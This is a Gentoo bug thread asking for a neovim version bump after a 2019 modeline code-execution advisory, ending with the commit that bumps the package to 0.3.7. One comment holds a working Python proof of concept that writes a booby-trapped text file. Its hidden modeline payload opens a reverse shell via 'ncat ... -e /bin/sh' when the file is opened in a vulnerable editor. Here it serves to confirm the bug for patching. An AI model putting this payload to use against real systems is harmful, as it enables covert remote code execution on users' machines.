The latest stable release is 0.3.5 https://github.com/neovim/neovim/releases/tag/stable Reproducible: Always
Would be nice to get a bump sooner rather than later https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md
(In reply to Michael Cook from comment #1) > Would be nice to get a bump sooner rather than later > https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim- > neovim.md PoC checks out - I can pop a shell on my box: ``` #!/usr/bin/env python3 with open('shell.txt', 'w') as out: print(""" \x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup ncat 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n """, file=out) ``` Above script relies on `ncat` instead of `nc`, as my `nc` doesn't support `-e`.
The bug has been closed via the following commit(s): https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=0e3eafdc9aab9c55badf38754e59acd7cf8aaa3f commit 0e3eafdc9aab9c55badf38754e59acd7cf8aaa3f Author: Tim Harder <radhermit@gentoo.org> AuthorDate: 2019-06-13 02:20:23 +0000 Commit: Tim Harder <radhermit@gentoo.org> CommitDate: 2019-06-13 02:24:02 +0000 app-editors/neovim: version bump to 0.3.7 Closes: https://bugs.gentoo.org/686400 Closes: https://bugs.gentoo.org/685162 Signed-off-by: Tim Harder <radhermit@gentoo.org> app-editors/neovim/Manifest | 1 + app-editors/neovim/neovim-0.3.7.ebuild | 96 ++++++++++++++++++++++++++++++++++ 2 files changed, 97 insertions(+)